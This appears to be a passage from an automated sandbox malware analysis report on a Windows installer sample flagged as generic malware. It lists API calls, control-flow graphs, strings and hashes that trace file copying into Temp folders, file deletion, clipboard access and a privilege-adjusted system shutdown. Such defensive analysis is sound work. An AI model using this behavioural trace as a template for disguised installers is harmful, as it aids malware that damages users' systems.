                                                                        • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036EF
                                                                        • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 0040379A
                                                                        • ExitProcess.KERNEL32 ref: 004037BB
                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",00000000,?,?,00000007,00000009,0000000B), ref: 004037CE
                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A14C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",00000000,?,?,00000007,00000009,0000000B), ref: 004037DD
                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",00000000,?,?,00000007,00000009,0000000B), ref: 004037E8
                                                                        • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 004037F4
                                                                        • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403810
                                                                        • DeleteFileA.KERNEL32(00429450,00429450,?,00430000,?,?,00000007,00000009,0000000B), ref: 0040386D
                                                                        • CopyFileA.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe,00429450,00000001), ref: 00403882
                                                                        • CloseHandle.KERNEL32(00000000,00429450,00429450,?,00429450,00000000,?,00000007,00000009,0000000B), ref: 004038AF
                                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038DD
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004038E4
                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038F8
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403917
                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 0040393C
                                                                        • ExitProcess.KERNEL32 ref: 0040395D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                        • String ID: "$"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"$.tmp$1033$A$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Moviedom230$C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe$Drivelingly Setup$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`KNw$~nsu
                                                                        • API String ID: 1000954069-232290593
                                                                        • Opcode ID: c19b75f2fa2de3e90f0fa3d4e92a1fee2e3f99131a1c1424620edc7f8390837b
                                                                        • Instruction ID: 223053d6f2ec0cc509bcc84454fcb5a587f3d9304b07d6be13cf3966b97333d0
                                                                        • Opcode Fuzzy Hash: c19b75f2fa2de3e90f0fa3d4e92a1fee2e3f99131a1c1424620edc7f8390837b
                                                                        • Instruction Fuzzy Hash: DCE1F470904354AADB21AF759D49B6F7EB8AF4570AF0440BFE441B62D2CB7C4A05CB2E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004054B6 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 271 4054b6-4054d2 272 405661-405667 271->272 273 4054d8-40559f GetDlgItem * 3 call 404309 call 404bfa GetClientRect GetSystemMetrics SendMessageA * 2 271->273 275 405691-40569d 272->275 276 405669-40568b GetDlgItem CreateThread FindCloseChangeNotification 272->276 294 4055a1-4055bb SendMessageA * 2 273->294 295 4055bd-4055c0 273->295 278 4056bf-4056c5 275->278 279 40569f-4056a5 275->279 276->275 283 4056c7-4056cd 278->283 284 40571a-40571d 278->284 281 4056e0-4056e7 call 40433b 279->281 282 4056a7-4056ba ShowWindow * 2 call 404309 279->282 291 4056ec-4056f0 281->291 282->278 289 4056f3-405703 ShowWindow 283->289 290 4056cf-4056db call 4042ad 283->290 284->281 287 40571f-405725 284->287 287->281 296 405727-40573a SendMessageA 287->296 292 405713-405715 call 4042ad 289->292 293 405705-40570e call 405378 289->293 290->281 292->284 293->292 294->295 300 4055d0-4055e7 call 4042d4 295->300 301 4055c2-4055ce SendMessageA 295->301 302 405740-40576c CreatePopupMenu call 4062ea AppendMenuA 296->302 303 405837-405839 296->303 310 4055e9-4055fd ShowWindow 300->310 311 40561d-40563e GetDlgItem SendMessageA 300->311 301->300 308 405781-405797 TrackPopupMenu 302->308 309 40576e-40577e GetWindowRect 302->309 303->291 308->303 312 40579d-4057b7 308->312 309->308 313 40560c 310->313 314 4055ff-40560a ShowWindow 310->314 311->303 315 405644-40565c SendMessageA * 2 311->315 316 4057bc-4057d7 SendMessageA 312->316 317 405612-405618 call 404309 313->317 314->317 315->303 316->316 318 4057d9-4057f9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 316->318 317->311 320 4057fb-40581b SendMessageA 318->320 320->320 321 40581d-405831 GlobalUnlock SetClipboardData CloseClipboard 320->321 321->303
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,00000403), ref: 00405515
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00405524
                                                                        • GetClientRect.USER32(?,?), ref: 00405561
                                                                        • GetSystemMetrics.USER32(00000002), ref: 00405568
                                                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405589
                                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040559A
                                                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 004055AD
                                                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 004055BB
                                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 004055CE
                                                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004055F0
                                                                        • ShowWindow.USER32(?,00000008), ref: 00405604
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405625
                                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405635
                                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040564E
                                                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040565A
                                                                        • GetDlgItem.USER32(?,000003F8), ref: 00405533
                                                                          • Part of subcall function 00404309: SendMessageA.USER32(00000028,?,00000001,00404139), ref: 00404317
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405676
                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_0000544A,00000000), ref: 00405684
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040568B
                                                                        • ShowWindow.USER32(00000000), ref: 004056AE
                                                                        • ShowWindow.USER32(?,00000008), ref: 004056B5
                                                                        • ShowWindow.USER32(00000008), ref: 004056FB
                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040572F
                                                                        • CreatePopupMenu.USER32 ref: 00405740
                                                                        • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405755
                                                                        • GetWindowRect.USER32(?,000000FF), ref: 00405775
                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578E
                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004057CA
                                                                        • OpenClipboard.USER32(00000000), ref: 004057DA
                                                                        • EmptyClipboard.USER32 ref: 004057E0
                                                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 004057E9
                                                                        • GlobalLock.KERNEL32(00000000), ref: 004057F3
                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405807
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405820
                                                                        • SetClipboardData.USER32(00000001,00000000), ref: 0040582B
                                                                        • CloseClipboard.USER32 ref: 00405831
                                                                        Strings
                                                                        • Drivelingly Setup: Installing, xrefs: 004057A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                        • String ID: Drivelingly Setup: Installing
                                                                        • API String ID: 4154960007-485533782
                                                                        • Opcode ID: 4a309e5079cdc708255a871e006116df9755c68536e1355fa5794f2576894f80
                                                                        • Instruction ID: 345e578925e8e8fc579d0e732d58a8f557a0115a7d420367cc7026d592e1690f
                                                                        • Opcode Fuzzy Hash: 4a309e5079cdc708255a871e006116df9755c68536e1355fa5794f2576894f80
                                                                        • Instruction Fuzzy Hash: D6A189B1900608BFDB11AF61DD89EAE7B79FB08354F40403AFA45B61A0CB758E51DF68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405A19 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 632 405a19-405a3f call 405cd7 635 405a41-405a53 DeleteFileA 632->635 636 405a58-405a5f 632->636 637 405be2-405be6 635->637 638 405a61-405a63 636->638 639 405a72-405a82 call 406257 636->639 640 405b90-405b95 638->640 641 405a69-405a6c 638->641 647 405a91-405a92 call 405c30 639->647 648 405a84-405a8f lstrcatA 639->648 640->637 643 405b97-405b9a 640->643 641->639 641->640 645 405ba4-405bac call 4065ce 643->645 646 405b9c-405ba2 643->646 645->637 655 405bae-405bc2 call 405be9 call 4059d1 645->655 646->637 650 405a97-405a9a 647->650 648->650 653 405aa5-405aab lstrcatA 650->653 654 405a9c-405aa3 650->654 656 405ab0-405ace lstrlenA FindFirstFileA 653->656 654->653 654->656 671 405bc4-405bc7 655->671 672 405bda-405bdd call 405378 655->672 657 405ad4-405aeb call 405c14 656->657 658 405b86-405b8a 656->658 665 405af6-405af9 657->665 666 405aed-405af1 657->666 658->640 662 405b8c 658->662 662->640 669 405afb-405b00 665->669 670 405b0c-405b1a call 406257 665->670 666->665 668 405af3 666->668 668->665 674 405b02-405b04 669->674 675 405b65-405b77 FindNextFileA 669->675 682 405b31-405b3c call 4059d1 670->682 683 405b1c-405b24 670->683 671->646 677 405bc9-405bd8 call 405378 call 406030 671->677 672->637 674->670 678 405b06-405b0a 674->678 675->657 680 405b7d-405b80 FindClose 675->680 677->637 678->670 678->675 680->658 691 405b5d-405b60 call 405378 682->691 692 405b3e-405b41 682->692 683->675 686 405b26-405b2f call 405a19 683->686 686->675 691->675 694 405b43-405b53 call 405378 call 406030 692->694 695 405b55-405b5b 692->695 694->675 695->675
                                                                        APIs
                                                                        • DeleteFileA.KERNELBASE(?,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"), ref: 00405A42
                                                                        • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"), ref: 00405A8A
                                                                        • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"), ref: 00405AAB
                                                                        • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"), ref: 00405AB1
                                                                        • FindFirstFileA.KERNEL32(0042B898,?,?,?,0040A014,?,0042B898,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"), ref: 00405AC2
                                                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B6F
                                                                        • FindClose.KERNEL32(00000000), ref: 00405B80
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A26
                                                                        • \*.*, xrefs: 00405A84
                                                                        • "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe", xrefs: 00405A22
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                        • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                        • API String ID: 2035342205-466807681
                                                                        • Opcode ID: 6279d5409f9ac8fecf523039a44e07b92db75dbea9c2d76fe17a079ddec69c30
                                                                        • Instruction ID: 3775624a82358ee84ae0e61ef35c65b769ecc780556a32b7edc65eda158531b4
                                                                        • Opcode Fuzzy Hash: 6279d5409f9ac8fecf523039a44e07b92db75dbea9c2d76fe17a079ddec69c30
                                                                        • Instruction Fuzzy Hash: D351BD30904A08AADB22AB618C89FAF7B78DF42714F24417BF441752D2D77C6982DE6D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402173 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F8
                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022AA
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende, xrefs: 00402238
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende
                                                                        • API String ID: 123533781-1242700388
                                                                        • Opcode ID: 1ce8e1dad735516c86711b48b508aba69c5835298ad9ca6a368bbeffde14f39b
                                                                        • Instruction ID: ec6a4b66970030f98d0c357d5daeebd90ed2a1685bb0ce4afdd26a2e8d50d7fb
                                                                        • Opcode Fuzzy Hash: 1ce8e1dad735516c86711b48b508aba69c5835298ad9ca6a368bbeffde14f39b
                                                                        • Instruction Fuzzy Hash: 68511675A00208BFDF10DFE4C988A9D7BB6AF48314F2045AAF505EB2D1DA799981CB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004065CE Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileA.KERNELBASE(774D3410,0042C0E0,0042BC98,00405D1A,0042BC98,0042BC98,00000000,0042BC98,0042BC98,774D3410,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,774D3410,C:\Users\user\AppData\Local\Temp\), ref: 004065D9
                                                                        • FindClose.KERNEL32(00000000), ref: 004065E5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFileFirst
                                                                        • String ID:
                                                                        • API String ID: 2295610775-0
                                                                        • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                        • Instruction ID: 8216c8ff522cab9e5c4fbd2006c0822adf2a7579a10bfa080a6703c422ecd414
                                                                        • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                        • Instruction Fuzzy Hash: 66D01231504520EBC7515B78BD0CC4B7A589F053313218A36F466F22E4CB34CC22A6DC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00403DDA Relevance: 63.4, APIs: 34, Strings: 2, Instructions: 357windowstringCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 322 403dda-403dec 323 403df2-403df8 322->323 324 403f53-403f62 322->324 323->324 325 403dfe-403e07 323->325 326 403fb1-403fc6 324->326 327 403f64-403fac GetDlgItem * 2 call 4042d4 SetClassLongA call 40140b 324->327 330 403e09-403e16 SetWindowPos 325->330 331 403e1c-403e23 325->331 328 404006-40400b call 404320 326->328 329 403fc8-403fcb 326->329 327->326 344 404010-40402b 328->344 333 403fcd-403fd8 call 401389 329->333 334 403ffe-404000 329->334 330->331 336 403e25-403e3f ShowWindow 331->336 337 403e67-403e6d 331->337 333->334 358 403fda-403ff9 SendMessageA 333->358 334->328 343 4042a1 334->343 345 403f40-403f4e call 40433b 336->345 346 403e45-403e58 GetWindowLongA 336->346 339 403e86-403e89 337->339 340 403e6f-403e81 DestroyWindow 337->340 350 403e8b-403e97 SetWindowLongA 339->350 351 403e9c-403ea2 339->351 347 40427e-404284 340->347 349 4042a3-4042aa 343->349 354 404034-40403a 344->354 355 40402d-40402f call 40140b 344->355 345->349 346->345 356 403e5e-403e61 ShowWindow 346->356 347->343 361 404286-40428c 347->361 350->349 351->345 357 403ea8-403eb7 GetDlgItem 351->357 362 404040-40404b 354->362 363 40425f-404278 DestroyWindow EndDialog 354->363 355->354 356->337 365 403ed6-403ed9 357->365 366 403eb9-403ed0 SendMessageA IsWindowEnabled 357->366 358->349 361->343 367 40428e-404297 ShowWindow 361->367 362->363 364 404051-40409e call 4062ea call 4042d4 * 3 GetDlgItem 362->364 363->347 394 4040a0-4040a5 364->394 395 4040a8-4040e4 ShowWindow KiUserCallbackDispatcher call 4042f6 EnableWindow 364->395 369 403edb-403edc 365->369 370 403ede-403ee1 365->370 366->343 366->365 367->343 372 403f0c-403f11 call 4042ad 369->372 373 403ee3-403ee9 370->373 374 403eef-403ef4 370->374 372->345 377 403f2a-403f3a SendMessageA 373->377 378 403eeb-403eed 373->378 374->377 379 403ef6-403efc 374->379 377->345 378->372 382 403f13-403f1c call 40140b 379->382 383 403efe-403f04 call 40140b 379->383 382->345 392 403f1e-403f28 382->392 390 403f0a 383->390 390->372 392->390 394->395 398 4040e6-4040e7 395->398 399 4040e9 395->399 400 4040eb-404119 GetSystemMenu EnableMenuItem SendMessageA 398->400 399->400 401 40411b-40412c SendMessageA 400->401 402 40412e 400->402 403 404134-40416e call 404309 call 403dbb call 406257 lstrlenA call 4062ea SetWindowTextA call 401389 401->403 402->403 403->344 414 404174-404176 403->414 414->344 415 40417c-404180 414->415 416 404182-404188 415->416 417 40419f-4041b3 DestroyWindow 415->417 416->343 418 40418e-404194 416->418 417->347 419 4041b9-4041e6 CreateDialogParamA 417->419 418->344 420 40419a 418->420 419->347 421 4041ec-404243 call 4042d4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 419->421 420->343 421->343 426 404245-404258 ShowWindow call 404320 421->426 428 40425d 426->428 428->347
                                                                        APIs
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E16
                                                                        • ShowWindow.USER32(?), ref: 00403E36
                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 00403E48
                                                                        • ShowWindow.USER32(?,00000004), ref: 00403E61
                                                                        • DestroyWindow.USER32 ref: 00403E75
                                                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403E8E
                                                                        • GetDlgItem.USER32(?,?), ref: 00403EAD
                                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403EC1
                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403EC8
                                                                        • GetDlgItem.USER32(?,00000001), ref: 00403F73
                                                                        • GetDlgItem.USER32(?,00000002), ref: 00403F7D
                                                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403F97
                                                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403FE8
                                                                        • GetDlgItem.USER32(?,00000003), ref: 0040408E
                                                                        • ShowWindow.USER32(00000000,?), ref: 004040AF
                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004040C1
                                                                        • EnableWindow.USER32(?,?), ref: 004040DC
                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040F2
                                                                        • EnableMenuItem.USER32(00000000), ref: 004040F9
                                                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00404111
                                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00404124
                                                                        • lstrlenA.KERNEL32(Drivelingly Setup: Installing,?,Drivelingly Setup: Installing,00000000), ref: 0040414E
                                                                        • SetWindowTextA.USER32(?,Drivelingly Setup: Installing), ref: 0040415D
                                                                        • ShowWindow.USER32(?,0000000A), ref: 00404291
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                        • String ID: Click Next to continue.$Drivelingly Setup: Installing
                                                                        • API String ID: 121052019-1179622201
                                                                        • Opcode ID: aac620bc095f4252ac758a5593f12f54aac5fa40f8eaddec9af95cb9fb46cec6
                                                                        • Instruction ID: f21371ea752dfce5ee3d4a80c6152a791402a2454a60405a922b397e1036299a
                                                                        • Opcode Fuzzy Hash: aac620bc095f4252ac758a5593f12f54aac5fa40f8eaddec9af95cb9fb46cec6
                                                                        • Instruction Fuzzy Hash: C1C1E5B1A00205AFDB207F62ED45E2B3A78EB85745F41053EF641B51F0CB799852DB2D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00403A3D Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
